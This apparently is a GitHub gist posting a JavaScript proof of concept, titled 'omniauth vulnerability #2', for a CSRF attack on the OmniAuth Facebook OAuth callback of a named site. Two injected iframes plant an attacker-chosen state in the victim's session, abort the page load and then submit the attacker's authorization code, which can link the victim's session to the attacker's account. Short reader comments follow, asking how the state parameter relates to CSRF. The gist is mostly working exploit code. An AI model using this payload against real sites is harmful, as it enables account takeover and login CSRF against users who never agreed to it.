public
Last active

omniauth vulnerability #2

  • Download Gist
gistfile1.txt
1 2 3 4 5 6 7
We just put our state in user's session, then abort loading page to avoid deleting our value and then use OUR code with OUR state. CSRF again.
 
document.write('<iframe src="https://obaz.com/users/auth/facebook?state=123" name=im></iframe>');
setTimeout(function(){
im.stop()
document.write("<iframe src='https://obaz.com/users/auth/facebook/callback?state=123&code=AQCR436EWAPR7or-wB61HtzW1F2O1MvhdRregxe7f4dwkFZIIioePO1HtMTPK2HLPKmq85F1Fl9QhgOISHu6UDhaxNJeZ3fVm2K_Sr9VbJHbiwhFdGpLxPefKMY6fiuaS9DgMYSb-0huKcMsTd1bP13l9nWgKgHmIL2Qh6imIXV0PqRboAgJu4Txk0obe6RPerZSrbwsHHTteUwV2eg_L19o'></iframe>");
},300)

Is this saying that the presence of the state parameter creates an opportunity for CSRF? Can you explain the gist a little more?

Does the presence of the state parameter make any difference in this scenario?

My understanding that the purpose of the state parameter itself is to help prevent CSRF (see: http://instagram.com/developer/authentication/) which states:

"Note: You may provide an optional state parameter to carry through any server-specific state you need to, for example, protect against CSRF issues."

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.